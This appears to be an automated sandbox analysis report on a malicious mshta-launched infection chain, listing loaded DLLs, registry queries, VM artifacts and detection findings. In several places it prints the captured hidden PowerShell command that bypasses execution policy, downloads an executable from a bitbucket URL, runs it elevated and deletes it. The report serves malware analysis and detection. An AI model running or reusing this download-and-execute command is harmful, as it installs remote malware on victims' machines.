Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msiso.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msimtf.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: jscript9.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source:

Binary string: ystem.pdb source: powershell.exe, 00000001.00000002.1993075264.0000000007811000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Suspicious powershell command line found

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "$path = $Env:temp + '\EkXH.exe'; $client = New-Object System.Net.WebClient; $client.downloadfile('https://bitbucket.org/docspaceplace/test2/downloads/1.exe', $path); Start-Sleep -Seconds 10; Start-Process -Verb RunAs -FilePath $path -ArgumentList '-install'; Start-Sleep -Seconds 20; Remove-Item -Verb RunAs -Path \$path -Force"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "$path = $Env:temp + '\EkXH.exe'; $client = New-Object System.Net.WebClient; $client.downloadfile('https://bitbucket.org/docspaceplace/test2/downloads/1.exe', $path); Start-Sleep -Seconds 10; Start-Process -Verb RunAs -FilePath $path -ArgumentList '-install'; Start-Sleep -Seconds 20; Remove-Item -Verb RunAs -Path \$path -Force"			Jump to behavior

Persistence and Installation Behavior

Tries to download and execute files (via powershell)

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "$path = $Env:temp + '\EkXH.exe'; $client = New-Object System.Net.WebClient; $client.downloadfile('https://bitbucket.org/docspaceplace/test2/downloads/1.exe', $path); Start-Sleep -Seconds 10; Start-Process -Verb RunAs -FilePath $path -ArgumentList '-install'; Start-Sleep -Seconds 20; Remove-Item -Verb RunAs -Path \$path -Force"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "$path = $Env:temp + '\EkXH.exe'; $client = New-Object System.Net.WebClient; $client.downloadfile('https://bitbucket.org/docspaceplace/test2/downloads/1.exe', $path); Start-Sleep -Seconds 10; Start-Process -Verb RunAs -FilePath $path -ArgumentList '-install'; Start-Sleep -Seconds 20; Remove-Item -Verb RunAs -Path \$path -Force"			Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5218			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4572			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7036

Thread sleep time: -14757395258967632s >= -30000s

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: mshta.exe, 00000000.00000003.1665182251.000000000336E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\;
Source: mshta.exe, 00000000.00000002.1669198025.00000000033B9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: powershell.exe, 00000001.00000002.1993136767.0000000007831000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: powershell.exe PID: 6676, type: MEMORYSTR

Bypasses PowerShell execution policy

Source: C:\Windows\SysWOW64\mshta.exe

Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "$path = $Env:temp + '\EkXH.exe'; $client = New-Object System.Net.WebClient; $client.downloadfile('https://bitbucket.org/docspaceplace/test2/downloads/1.exe', $path); Start-Sleep -Seconds 10; Start-Process -Verb RunAs -FilePath $path -ArgumentList '-install'; Start-Sleep -Seconds 20; Remove-Item -Verb RunAs -Path \$path -Force"

Source: C:\Windows\SysWOW64\mshta.exe

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy bypass -noprofile -windowstyle hidden -command "$path = $env:temp + '\ekxh.exe'; $client = new-object system.net.webclient; $client.downloadfile('https://bitbucket.org/docspaceplace/test2/downloads/1.exe', $path); start-sleep -seconds 10; start-process -verb runas -filepath $path -argumentlist '-install'; start-sleep -seconds 20; remove-item -verb runas -path \$path -force"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy bypass -noprofile -windowstyle hidden -command "$path = $env:temp + '\ekxh.exe'; $client = new-object system.net.webclient; $client.downloadfile('https://bitbucket.org/docspaceplace/test2/downloads/1.exe', $path); start-sleep -seconds 10; start-process -verb runas -filepath $path -argumentlist '-install'; start-sleep -seconds 20; remove-item -verb runas -path \$path -force"			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
